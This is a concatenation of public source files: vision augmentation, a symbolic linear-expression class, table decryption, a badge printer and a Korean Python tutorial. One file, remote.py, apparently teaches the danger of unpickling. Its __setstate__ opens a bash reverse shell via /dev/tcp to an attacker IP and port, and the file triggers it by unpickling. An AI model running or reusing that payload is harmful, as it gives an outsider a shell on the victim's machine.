        dy = round(np.random.uniform(shift_limit[0], shift_limit[1]) * height)

        # 2x2 rotation+scale matrix (angle in degrees -> radians).
        cc = np.math.cos(angle / 180 * np.math.pi) * sx
        ss = np.math.sin(angle / 180 * np.math.pi) * sy
        rotate_matrix = np.array([[cc, -ss], [ss, cc]])

        # Map the image corners through the warp (about the image centre).
        box0 = np.array([[0, 0], [width, 0], [width, height], [0, height], ])
        box1 = box0 - np.array([width / 2, height / 2])
        box1 = np.dot(box1, rotate_matrix.T) + np.array([width / 2 + dx, height / 2 + dy])

        box0 = box0.astype(np.float32)
        box1 = box1.astype(np.float32)
        mat = cv2.getPerspectiveTransform(box0, box1)
        # Out-of-frame pixels are filled with the border colour (black).
        image = cv2.warpPerspective(image, mat, (width, height), flags=cv2.INTER_LINEAR, borderMode=borderMode,
                                    borderValue=(
                                        0, 0,
                                        0,))

    return image
def aug_image(image, is_infer=False):
    """Augment an image for training, or apply the deterministic eval crop.

    Inference path: disabled flip (u=0) plus a fixed 0.8-ratio crop (code=0).
    Training path: random flip, random shift/scale/rotate, resize back to the
    original size, random erasing, then a random crop with ratio in [0.6, 0.99).
    """
    if is_infer:
        image = randomHorizontalFlip(image, u=0)
        return cropping(np.asarray(image), ratio=0.8, code=0)

    image = randomHorizontalFlip(image)
    height, width, _ = image.shape
    image = randomShiftScaleRotate(image,
                                   shift_limit=(-0.1, 0.1),
                                   scale_limit=(-0.1, 0.1),
                                   aspect_limit=(-0.1, 0.1),
                                   rotate_limit=(-30, 30))
    # The warp preserves size; resize defensively before erasing/cropping.
    image = cv2.resize(image, (width, height))
    image = random_erasing(image, probability=0.5, sl=0.02, sh=0.4, r1=0.3)
    crop_ratio = random.uniform(0.6, 0.99)
    return random_cropping(image, ratio=crop_ratio, is_random=True)
def generate_dataset_loader(df_all, c_train, train_transform, train_batch_size, c_val, val_transform, val_batch_size, workers):
    """Build the train/validation DataLoaders for the RSNA study datasets.

    Training loader shuffles and drops the last partial batch; validation
    loader is sequential and keeps every sample.
    """
    train_loader = torch.utils.data.DataLoader(
        RSNA_Dataset_train_by_study_context(df_all, c_train, train_transform),
        batch_size=train_batch_size,
        shuffle=True,
        num_workers=workers,
        pin_memory=True,
        drop_last=True)
    val_loader = torch.utils.data.DataLoader(
        RSNA_Dataset_val_by_study_context(df_all, c_val, val_transform),
        batch_size=val_batch_size,
        shuffle=False,
        num_workers=workers,
        pin_memory=True,
        drop_last=False)
    return train_loader, val_loader
| 35.428571 | 127 | 0.585905 |
791a1d723e3ac41611111288856b9455ae2db9b4
| 7,325 |
py
|
Python
|
resources/mechanics_lib/api/symbolic.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | 7 |
2016-01-20T02:33:00.000Z
|
2021-02-04T04:06:57.000Z
|
resources/mechanics_lib/api/symbolic.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | null | null | null |
resources/mechanics_lib/api/symbolic.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | 3 |
2016-10-05T07:20:30.000Z
|
2017-11-20T10:36:50.000Z
|
import math
from operator import add, mul, div, sub
class Symbol:
    """A named symbolic variable, optionally carrying a numeric default.

    Instances are used as dictionary keys inside LinearExpr and rely on the
    default identity-based hashing/equality.
    """
    def __init__(self, name, default=None):
        self.name = name
        self.default = default
    def __str__(self):
        return self.name
    def __repr__(self):
        if self.default is None:
            return 'SYMB[%s]' % self.name
        return 'SYMB[%s=%f]' % (self.name, self.default)
    def toLinearExpr(self):
        """Promote this symbol to a LinearExpr with coefficient 1."""
        return LinearExpr({self: 1})
def testResult(result, op, *args):
    """Assert that *result* agrees with op(...) on the default-evaluated args."""
    expected = op(*[LinearExpr.evalDefault(arg) for arg in args])
    actual = LinearExpr.evalDefault(result)
    assert abs(actual - expected) < 1e-6
def tested(op):
def decorator(f):
def actual(*args):
result = f(*args)
testResult(result, op, *args)
return result
return actual
return decorator
class LinearExpr:
    """A linear expression: sum of (Symbol * coefficient) terms plus a constant.

    Arithmetic operators build new LinearExpr objects; each decorated
    operator is self-checked at call time against the plain-number result
    via @tested.

    NOTE(review): this class is Python-2-only as written — it defines
    __div__/__rdiv__ (ignored by Python 3), concatenates dict .keys() with
    '+', and uses dict.iteritems(). Porting to Python 3 would require
    __truediv__, list()/set() conversions, and .items().
    NOTE(review): several error paths use `raise (message, self, other)` —
    raising a tuple is not a valid exception even in Python 2 and would
    itself produce a TypeError; these should raise ValueError instead.
    """
    def __init__(self, coeffs=None, const=0.0):
        # Drop near-zero coefficients/constant so expressions normalize.
        if not coeffs: coeffs = {}
        self.coeffs = {}
        self.const = float(const)
        if abs(self.const) < 1e-7:
            self.const = 0.0
        for symbol in coeffs:
            if not abs(coeffs[symbol]) < 1e-7:
                self.coeffs[symbol] = coeffs[symbol]
    @tested(add)
    def __add__(self, other):
        """Add a LinearExpr or a plain number, term by term."""
        if not isinstance(other, LinearExpr):
            return self + LinearExpr(const=other)
        newcoeffs = dict(self.coeffs)
        for var in other.coeffs:
            if var in newcoeffs:
                newcoeffs[var] += other.coeffs[var]
            else:
                newcoeffs[var] = other.coeffs[var]
        return LinearExpr(newcoeffs, self.const + other.const)
    __radd__ = __add__
    @tested(mul)
    def __mul__(self, other):
        """Scale by a number, or by a *constant* LinearExpr (else non-linear)."""
        if isinstance(other, LinearExpr):
            if len(self.coeffs) == 0:
                return other * self.const
            if len(other.coeffs) == 0:
                return self * other.const
            raise ("Multiplying two non-const linear expressions would result in a non-linear expression", self, other)
        else:
            scale = float(other)
            newcoeffs = {}
            for var in self.coeffs:
                newcoeffs[var] = self.coeffs[var] * scale
            return LinearExpr(newcoeffs, self.const * scale)
    __rmul__ = __mul__
    @tested(lambda x,y:float(x)/y)
    def __div__(self, other):
        """Divide by a number/constant expr, or by a proportional expr.

        When `other` is non-constant, the quotient is only defined if every
        coefficient pair (and the constants) share one common ratio; in
        that case a plain number is returned.
        """
        if not isinstance(other, LinearExpr):
            return self * (1.0 / other)
        elif len(other.coeffs)==0:
            return self * (1.0 / other.const)
        else:
            ratio = [None]
            # Single-element list works around Py2's lack of `nonlocal`.
            def feedNewRatio(newRatio):
                if ratio[0] is None:
                    ratio[0] = newRatio
                elif abs(ratio[0] - newRatio) < 1e-6:
                    pass
                else:
                    raise ("Cannot divide due to non-constant quotient", self, other)
            for symbol in set(self.coeffs.keys() + other.coeffs.keys()):
                vala = self.coeffs[symbol] if symbol in self.coeffs else 0.0
                valb = other.coeffs[symbol] if symbol in other.coeffs else 0.0
                if valb == 0.0:
                    raise ("Cannot divide due to non-constant quotient or division by zero", self, other)
                feedNewRatio(vala / valb)
            if ratio[0] is None:
                return self.const / other.const
            else:
                # NOTE(review): `abs(self.const)` is tested twice — the second
                # check was presumably meant to be `abs(other.const)`; confirm.
                if not (abs(self.const) < 1e-6 and abs(self.const) < 1e-6):
                    feedNewRatio(self.const / other.const)
                return ratio[0]
    @tested(lambda x,y:float(y)/x)
    def __rdiv__(self, other):
        """number / expr: only 0 divided by a non-zero expression is defined."""
        if abs(other) < 1e-6 and self.coeffs != 0.0:
            return 0
        else:
            raise ("Cannot divide due to non-constant quotient or division by zero", self, other)
    @tested(sub)
    def __sub__(self, other):
        """Subtract a LinearExpr or a plain number, term by term."""
        if not isinstance(other, LinearExpr):
            return self - LinearExpr(const=other)
        newcoeffs = dict(self.coeffs)
        for var in other.coeffs:
            if var in newcoeffs:
                newcoeffs[var] -= other.coeffs[var]
            else:
                newcoeffs[var] = -other.coeffs[var]
        return LinearExpr(newcoeffs, self.const - other.const)
    @tested(lambda x,y:y-x)
    def __rsub__(self, other):
        return LinearExpr(const=other) - self
    @tested(lambda x:-x)
    def __neg__(self):
        """Negate every coefficient and the constant."""
        newcoeffs = {}
        for var in self.coeffs:
            newcoeffs[var] = -self.coeffs[var]
        return LinearExpr(newcoeffs, -self.const)
    @staticmethod
    @tested(lambda a,b:math.atan2(a,b))
    def atan2(a, b):
        """atan2 of two expressions; defined only when a and b are proportional,
        so the angle is the same for every assignment. Returns a plain number."""
        if not isinstance(a, LinearExpr):
            a = LinearExpr(const=a)
        if not isinstance(b, LinearExpr):
            b = LinearExpr(const=b)
        defaultA = LinearExpr.evalDefault(a)
        defaultB = LinearExpr.evalDefault(b)
        res = [math.atan2(defaultA, defaultB)] # enclosed in array to get around closure issues
        def feedNewRes(newRes):
            # Accept angles equal to the default, or exactly pi apart
            # (opposite quadrant, same line through the origin).
            if abs(abs(newRes - res[0]) - math.pi) < 1e-6:
                pass
            elif abs(newRes - res[0]) < 1e-6:
                pass
            else:
                raise ("Cannot take atan2 of two linear expressions that do not have a constant ratio", a, b)
        for symbol in set(a.coeffs.keys() + b.coeffs.keys()):
            vala = a.coeffs[symbol] if symbol in a.coeffs else 0.0
            valb = b.coeffs[symbol] if symbol in b.coeffs else 0.0
            feedNewRes(math.atan2(vala, valb))
        # NOTE(review): `res` is a list and can never be None — this branch
        # looks dead; presumably `ratio`-style logic was copied from __div__.
        if res is None:
            return math.atan2(a.const, b.const)
        else:
            if not (abs(a.const) < 1e-7 and abs(b.const) < 1e-7):
                feedNewRes(math.atan2(a.const, b.const))
            return res[0]
    @staticmethod
    @tested(lambda a,b:math.hypot(a,b))
    def hypot(a, b):
        """Euclidean norm of (a, b); returns an expression proportional to the
        larger of the two (requires a and b to have a constant ratio)."""
        if not isinstance(a, LinearExpr):
            a = LinearExpr(const=a)
        if not isinstance(b, LinearExpr):
            b = LinearExpr(const=b)
        LinearExpr.atan2(a, b) # ensure that the ratio is constant
        aEval = LinearExpr.evalDefault(a)
        bEval = LinearExpr.evalDefault(b)
        result = math.hypot(aEval, bEval)
        if max(abs(aEval), abs(bEval)) < 1e-6:
            return LinearExpr(const=0.0)
        elif abs(aEval) < abs(bEval):
            return result / bEval * b
        else:
            return result / aEval * a
    def eval(self, assignment):
        """Substitute symbols from `assignment`; returns a number if every
        symbol was substituted, otherwise a reduced LinearExpr."""
        newcoeffs = {}
        const = self.const
        for var in self.coeffs:
            if var in assignment:
                const += self.coeffs[var] * assignment[var]
            else:
                newcoeffs[var] = self.coeffs[var]
        if len(newcoeffs) > 0:
            return LinearExpr(newcoeffs, const)
        else:
            return const
    @staticmethod
    def evalDefault(expr):
        """Evaluate using each symbol's default value; numbers pass through."""
        if not isinstance(expr, LinearExpr):
            return expr
        assignment = {}
        for symbol in expr.coeffs:
            if symbol.default is None:
                raise ("Cannot evaluate default, symbol missing default", expr)
            assignment[symbol] = symbol.default
        return expr.eval(assignment)
    def __str__(self):
        # Render as e.g. "1.5+2.0x-3.0y"; term order follows dict iteration.
        res = ''
        first = True
        if self.const != 0.0:
            res += str(self.const)
            first = False
        for symbol in self.coeffs:
            coeff = self.coeffs[symbol]
            if coeff > 0 and not first:
                res += '+' + str(coeff) + str(symbol.name)
            else:
                res += str(coeff) + str(symbol.name)
            first = False
        if res == '':
            return '0.0'
        return res
    def __eq__(self, other):
        if not isinstance(other, LinearExpr):
            return self.__eq__(LinearExpr(const=other))
        return (self.coeffs, self.const) == (other.coeffs, other.const)
    def __hash__(self):
        # Constant expressions hash like their constant so expr == number
        # implies equal hashes.  (iteritems is Python-2-only.)
        if len(self.coeffs) == 0:
            return hash(self.const)
        return hash((frozenset(self.coeffs.iteritems()), self.const))
    @staticmethod
    def round(expr, dig):
        """Round every coefficient and the constant to `dig` decimal places."""
        if not isinstance(expr, LinearExpr):
            return LinearExpr.round(LinearExpr(const=expr), dig)
        else:
            newcoeffs = {}
            for var in expr.coeffs:
                newcoeffs[var] = round(expr.coeffs[var], dig)
            return LinearExpr(newcoeffs, round(expr.const, dig))
    __repr__ = __str__
| 29.417671 | 113 | 0.625119 |
f776538d6282674313ee6dc35b608e379b9e103d
| 462 |
py
|
Python
|
python/pickle/remote.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/pickle/remote.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/pickle/remote.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
import pickle
import os
class foobar:
    """Educational demonstration of a pickle deserialization vulnerability.

    SECURITY WARNING: unpickling an instance of this class executes an
    attacker-controlled shell command (a reverse shell) from __setstate__.
    This is exactly why pickle.loads must NEVER be called on untrusted
    data — deserialization runs code before the caller sees any object.
    """
    def __init__(self):
        pass
    def __getstate__(self):
        # Normal pickling behavior: serialize the instance __dict__.
        return self.__dict__
    def __setstate__(self, state):
        # Invoked automatically by pickle during load — the payload below
        # runs with the privileges of whatever process unpickles this.
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.1681.10/8080 0>&1"')
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
| 22 | 83 | 0.621212 |
f783c7d956c2efc0cb4921dd6357b6611624950a
| 572 |
py
|
Python
|
lintcode/035-[DUP]-Search-Insert-Position/SearchInsertPosition_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
lintcode/035-[DUP]-Search-Insert-Position/SearchInsertPosition_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
lintcode/035-[DUP]-Search-Insert-Position/SearchInsertPosition_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
class Solution:
    """
    @param A : a list of integers
    @param target : an integer to be inserted
    @return : an integer
    """
    def searchInsert(self, A, target):
        """Binary search: return target's index in sorted A, or the index
        where it would be inserted to keep A sorted. O(log n); returns 0
        for an empty list."""
        l, r = 0, len(A) - 1
        while l <= r:
            # BUG FIX: use floor division so the midpoint stays an int —
            # plain '/' yields a float on Python 3 and breaks list indexing.
            m = (l + r) // 2
            if A[m] == target:
                return m
            elif A[m] > target:
                r = m - 1
            else:
                l = m + 1
        return l
# Manual check: print the insert position for each target value.
sl = Solution()
A = [1, 3, 5, 6]
target = [5, 2, 7, 0]
for t in target:
    # BUG FIX: the original had a bare `print` statement on its own line,
    # so the searchInsert result was computed but never printed.
    print(sl.searchInsert(A, t))
| 20.428571 | 45 | 0.431818 |
e3cdadd33382dcd22537074f84cb4cc19d050097
| 1,423 |
py
|
Python
|
prepareTables.py
|
flying-sheep/optolith-client
|
dd3077164e31696b0bb0c8ae8fb895f99ebba6f1
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
prepareTables.py
|
flying-sheep/optolith-client
|
dd3077164e31696b0bb0c8ae8fb895f99ebba6f1
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
prepareTables.py
|
flying-sheep/optolith-client
|
dd3077164e31696b0bb0c8ae8fb895f99ebba6f1
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
import base64
import os
import os.path
import sys
import zipfile
import cryptography
from cryptography.fernet import Fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
def decryptTables():
    """Decrypt Tables.crypto into Tables.zip.

    The Fernet key is derived with PBKDF2-HMAC-SHA256 (fixed salt,
    100000 iterations) from the OPTOLITH_KEY environment variable.

    Raises:
        KeyError: if OPTOLITH_KEY is not set.
    """
    print("Decrypting tables")
    # Passphrase comes from the environment.
    passphrase = os.environ['OPTOLITH_KEY']
    # Derive a 32-byte key, then urlsafe-b64 encode it as Fernet expects.
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=b'optolithSalt',
        iterations=100000,
        backend=default_backend())
    fernet_key = base64.urlsafe_b64encode(kdf.derive(passphrase.encode(encoding='UTF-8')))
    fernet = Fernet(fernet_key)
    # Decrypt the whole archive in one pass.
    with open("Tables.crypto", "rb") as encrypted_file:
        ciphertext = encrypted_file.read()
    with open("Tables.zip", "wb") as decrypted_file:
        decrypted_file.write(fernet.decrypt(ciphertext))
    print("Tables decrypted")
def prepareTables():
    """Unpack Tables.zip into app/Database (created if necessary)."""
    print("Unpacking tables")
    # ROBUSTNESS FIX: os.mkdir raised if the parent 'app' directory was
    # missing or if the target already existed; makedirs(exist_ok=True)
    # handles both and makes the step idempotent.
    os.makedirs("app/Database", exist_ok=True)
    with zipfile.ZipFile("Tables.zip", 'r') as zip_ref:
        zip_ref.extractall("app/Database")
    print("Tables unpacked")
if __name__ == "__main__":
    # Entry point: decrypt the encrypted archive, then unpack it into
    # app/Database (requires OPTOLITH_KEY in the environment).
    print("Start to prepare tables...")
    decryptTables()
    prepareTables()
    print("Preparing tables finished")
| 27.365385 | 82 | 0.696416 |
583543d3f10a9e7a836f64188b7503eb2a4a8e08
| 5,422 |
py
|
Python
|
badgeprinter.py
|
pintman/badgeprinter
|
c8030624a3f2cd33bf8e0b041175e0257eabf815
|
[
"MIT"
] | null | null | null |
badgeprinter.py
|
pintman/badgeprinter
|
c8030624a3f2cd33bf8e0b041175e0257eabf815
|
[
"MIT"
] | 1 |
2017-07-01T12:14:47.000Z
|
2017-07-09T11:00:37.000Z
|
badgeprinter.py
|
pintman/badgeprinter
|
c8030624a3f2cd33bf8e0b041175e0257eabf815
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -'''- coding: utf-8 -'''-
import sys
import subprocess
from PySide.QtCore import *
from PySide.QtGui import *
from PySide.QtDeclarative import *
import PIL
import PIL.Image
import sqlite3
import random
from time import sleep
import os
import configparser
os.chdir(os.path.dirname(os.path.realpath(__file__)))
class MyHandler(QObject):
    """Qt-side controller for the badge printer.

    Grabs the rendered badge widget as an image, pipes it through
    ImageMagick `convert` to a PDF, sends it to a Brother label printer
    via `lpr`, and logs each badge in a local SQLite database.

    NOTE(review): run() and reset_ui() reference the module-level global
    `window` (set in the __main__ block) rather than self.window —
    presumably intentional, but worth confirming/unifying.
    """
    def __init__(self, window, app, hashtag, logo_filename, *args, **kwargs):
        QObject.__init__(self, *args, **kwargs)
        self.window = window
        self.app = app
        self.hashtag = hashtag
        self.logo_filename = logo_filename
        # Open (or create) the badge log database and ensure the table exists.
        self.conn = sqlite3.connect('badges.db')
        c = self.conn.cursor()
        c.execute(""" CREATE TABLE IF NOT EXISTS badges (created datetime, name text, twitter text, ticket text) """)
        self.conn.commit()
    def get_ticket_number(self):
        """Return a 4-digit raffle ticket number not yet used in the DB."""
        c = self.conn.cursor()
        while True:
            ticket = "%04d" % random.randint(1,9999)
            # Parameterized query — safe against SQL injection.
            c.execute(""" SELECT count(*) FROM badges WHERE ticket=? """, (ticket,))
            if c.fetchone()[0] == 0:
                c.close()
                return ticket
    @Slot()
    def run(self):
        """Render, print and log the current badge, then schedule a UI reset."""
        inputTwitter = window.rootObject().findChild(QObject, 'inputTwitter')
        inputTwitter.select(0,0)
        # Hide the twitter field on the printed badge if left at the
        # placeholder or empty.
        if inputTwitter.property('text') == "@twitter" or len(inputTwitter.property("text")) < 1:
            inputTwitter.setProperty("visible", False)
        inputName = window.rootObject().findChild(QObject, 'inputName')
        inputName.select(0,0)
        checkboxSelected = window.rootObject().findChild(QObject, 'checkboxSelected').property('visible')
        label = window.rootObject().findChild(QObject, 'textLos')
        ticket = ''
        if checkboxSelected:
            # Raffle opt-in: allocate a unique ticket and show it on the badge.
            ticket = self.get_ticket_number()
            label.setProperty("text", "Los #%s" % ticket)
            #label.setProperty("visible", True)
        inputName.setProperty('focus', False)
        inputTwitter.setProperty('focus', False)
        # Screenshot just the badge area of the window.
        badge = window.rootObject().findChild(QObject, 'badge')
        image = QPixmap.grabWidget(window, badge.x(), badge.y(), badge.width(), badge.height())
        window.rootObject().findChild(QObject, "animateNameBadgeOff").start()
        # Let the hide animation run before we continue (up to 2 s of events).
        self.app.processEvents(QEventLoop.AllEvents, 2000)
        # Serialize the grab to PNG in memory.
        # NOTE(review): `bytes` and `buffer` shadow Python builtins.
        bytes = QByteArray()
        buffer = QBuffer(bytes)
        buffer.open(QIODevice.WriteOnly)
        image.save(buffer, "PNG")
        # Scale factor for the label printer output (38x50 mm label).
        density = 284 / (38.0/50.0)
        # PNG (stdin) -> resized PDF via ImageMagick, then print with lpr.
        convert = subprocess.Popen(['convert', '-density', '%d' % density, '-quality', '100', 'png:-', '-gravity', 'center', '-resize', '2430x1420!', '/tmp/badge.pdf'], stdin=subprocess.PIPE)
        convert.communicate(bytes.data())
        lpr = subprocess.Popen(['lpr', '-PBrother_QL-710W', '-o', 'fit-to-page', '/tmp/badge.pdf'])
        lpr.communicate()
        #convert.stdout.close()
        #convert.wait()#
        # Log the printed badge (parameterized insert).
        c = self.conn.cursor()
        c.execute(""" INSERT INTO badges (created, name, twitter,
        ticket) VALUES (datetime('now'),?,?,?) """,
                  (inputName.property('text'), inputTwitter.property('text'),
                   ticket))
        self.conn.commit()
        c.close()
        # Reset the form after a short delay so the user sees the result.
        QTimer.singleShot(2000, lambda: self.reset_ui())
    def reset_ui(self):
        """Restore all QML form fields to their placeholder state."""
        label = window.rootObject().findChild(QObject, 'textLos')
        label.setProperty("text", "Los #XXXX")
        inputName = window.rootObject().findChild(QObject, 'inputName')
        inputName.setProperty('text', "Vorname")
        inputName.selectAll()
        inputName.setProperty('focus', True)
        inputTwitter = window.rootObject().findChild(QObject, 'inputTwitter')
        inputTwitter.setProperty("visible", True)
        inputTwitter.setProperty('text', "@twitter")
        txtHashtag = window.rootObject().findChild(QObject, 'textHashtag')
        txtHashtag.setProperty("text", self.hashtag)
        imgLogo = window.rootObject().findChild(QObject, 'imgLogo')
        imgLogo.setProperty('source', self.logo_filename)
        window.rootObject().findChild(QObject, 'checkboxSelected').setProperty("visible", True)
        window.rootObject().findChild(QObject, 'printButtonArea').setProperty('enabled', True)
        window.rootObject().findChild(QObject, "animateNameBadgeOn").start()
# Our main window
class MainWindow(QDeclarativeView):
    """Declarative view that renders the badge UI from view.qml."""
    def __init__(self, parent=None):
        super(MainWindow, self).__init__(parent)
        self.setWindowTitle("Main Window")
        # Renders 'view.qml'
        self.setSource(QUrl.fromLocalFile('view.qml'))
        # QML resizes to main window
        self.setResizeMode(QDeclarativeView.SizeRootObjectToView)
if __name__ == '__main__':
    # read config (hashtag and logo come from config.ini, section [default])
    config = configparser.ConfigParser()
    config.read("config.ini")
    # Create the Qt Application
    app = QApplication(sys.argv)
    # Create and show the main window (frameless, full screen kiosk mode)
    window = MainWindow()
    window.setWindowFlags(Qt.FramelessWindowHint)
    handler = MyHandler(window, app, hashtag=config['default']['hashtag'],
                        logo_filename=config['default']['logo_filename'])
    handler.reset_ui()
    # Expose the handler to QML so buttons can invoke its slots.
    window.rootContext().setContextProperty("handler", handler)
    window.rootObject().findChild(QObject, 'inputName').selectAll()
    window.showFullScreen()
    # Run the main Qt loop
    sys.exit(app.exec_())
| 36.884354 | 193 | 0.632239 |
5475bff1e28db07ad788dae614bde2a3e0dbdf44
| 191 |
py
|
Python
|
exercises/en/exc_03_14_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | 2 |
2020-07-07T01:46:37.000Z
|
2021-04-20T03:19:43.000Z
|
exercises/en/exc_03_14_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/en/exc_03_14_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
import spacy
# Blank English pipeline: tokenizer only, no trained components.
nlp = spacy.blank("en")
people = ["David Bowie", "Angela Merkel", "Lady Gaga"]
# Create a list of patterns for the PhraseMatcher
# (each pattern is the Doc produced by running a name through the pipeline)
patterns = [nlp(person) for person in people]
| 21.222222 | 54 | 0.712042 |
5491672aaacc47d79cd598167ffc71acb67f4987
| 19,823 |
py
|
Python
|
python/en/archive/books/jump2python/j2p-05_6_1-import_modules.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/books/jump2python/j2p-05_6_1-import_modules.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/books/jump2python/j2p-05_6_1-import_modules.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
j2p-05_6-import_modules.py
p.251, 05-6. 외장 함수
The Python Standard Library¶
https://docs.python.org/3/library/index.html
Copy & Paste the commands in this script.
이 스크립트의 명령어는 복사해서 Python prompt >>> 에 붙이기로 실행.
"""
#%% sys
# sys 모듈로 파이썬 인터프리터가 제공하는 변수와 함수를 직접 제어할 수 있다.
# sys.argv 명령 행에서 인수 전달하기
# argv_test.py
import sys
print( sys.argv )
# 윈도우즈
# > python test.py abc pey guido
# 리눅스
# $ python test.py abc pey guido
#
# 파이썬 명령어를 위와 같이 실행하면
# 입력인수 (test.py abc pey guido)가 sys.argv라는 리스트에 저장된다.
# ['test.py', 'abc', 'pey', 'guido']
# sys.exit 강제로 스크립트 종료하기
# >>> sys.exit()
# 를 실행하면 Ctrl + Z, Ctrl+D를 눌러서 대화형 인터프리터를 종료하는 것과 같다.
# sys.path 자신이 만든 모듈 불러와 사용하기
# sys.path는 파이썬 모듈이 저장된 위치를 나타낸다.
# 이 경로에 있는 파이썬 모듈들은 어디에서나 불러올 수 있다.
# Windows 10의 Ubuntu Linux
# aimldl@DESKTOP-HPVQJ6N:/mnt/c/Users/aimldl/Desktop$ python3
# Python 3.6.7 (default, Oct 22 2018, 11:32:17)
# [GCC 8.2.0] on linux
# Type "help", "copyright", "credits" or "license" for more information.
# >>> import sys
# >>> sys.path
# ['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']
# >>>
# '' = 현재 디렉터리
# Windows 10의 Anaconda Prompt
# (base) C:\Users\aimldl>python
# Python 3.7.3 (default, Mar 27 2019, 17:13:21) [MSC v.1915 64 bit (AMD64)] :: Anaconda, Inc. on win32
# Type "help", "copyright", "credits" or "license" for more information.
# >>> import sys
# >>> sys.path
# ['', 'C:\\Users\\aimldl\\Anaconda3\\python37.zip', 'C:\\Users\\aimldl\\Anaconda3\\DLLs', 'C:\\Users\\aimldl\\Anaconda3\\lib', 'C:\\Users\\aimldl\\Anaconda3', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages\\win32', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages\\win32\\lib', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages\\Pythonwin']
# >>>
# path_append.py
import sys
sys.path.append('C:\\Python\\Mymodules')
#%% pickle
# pickle모듈로 객체의 형태를 그대로 유지하면서, 파일에 저장하고 불러올 수 있다.
# write2pickle.py
import pickle
f = open('test.txt','wb')
data = {1:'python', 2:'you need'}
pickle.dump( data,f )
f.close()
# read_thru_pickle.py
import pickle
f = open('test.txt','rb')
data = pickle.load( f )
print( data )
# {2:'you need', 1:'python'}
#%% OS
# OS모듈로 환경변수, 디렉토리, 파일 등 OS자원을 제어할 수 있다.
####################################################
# os.environ 내 시스템의 환경 변수 값을 알고 싶을 때 #
####################################################
# 시스템은 제각기 다른 환경변수 값을 가지고 있다. 그 값을 확인할 수 있다.
import os
os.environ
# Windows 10의 Anaconda Prompt
#environ({'ALLUSERSPROFILE': 'C:\\ProgramData',
# 'APPDATA': 'C:\\Users\\aimldl\\AppData\\Roaming',
# 'COMMONPROGRAMFILES': 'C:\\Program Files\\Common Files',
# 'COMMONPROGRAMFILES(X86)': 'C:\\Program Files (x86)\\Common Files',
# 'COMMONPROGRAMW6432': 'C:\\Program Files\\Common Files',
# 'COMPUTERNAME': 'DESKTOP-HPVQJ6N',
# 'COMSPEC': 'C:\\Windows\\system32\\cmd.exe',
# 'CONDA_DEFAULT_ENV': 'base',
# 'CONDA_EXE': 'C:\\Users\\aimldl\\Anaconda3\\Scripts\\conda.exe',
# 'CONDA_PREFIX': 'C:\\Users\\aimldl\\Anaconda3',
# 'CONDA_PROMPT_MODIFIER': '(base) ',
# 'CONDA_PYTHON_EXE': 'C:\\Users\\aimldl\\Anaconda3\\python.exe',
# 'CONDA_SHLVL': '1',
# 'DRIVERDATA': 'C:\\Windows\\System32\\Drivers\\DriverData',
# 'FPS_BROWSER_APP_PROFILE_STRING': 'Internet Explorer',
# 'FPS_BROWSER_USER_PROFILE_STRING': 'Default',
# 'HOMEDRIVE': 'C:',
# 'HOMEPATH': '\\Users\\aimldl',
# 'LOCALAPPDATA': 'C:\\Users\\aimldl\\AppData\\Local',
# 'LOGONSERVER': '\\\\DESKTOP-HPVQJ6N',
# 'NUMBER_OF_PROCESSORS': '8',
# 'ONEDRIVE': 'C:\\Users\\aimldl\\OneDrive',
# 'ONEDRIVECONSUMER': 'C:\\Users\\aimldl\\OneDrive',
# 'OS': 'Windows_NT',
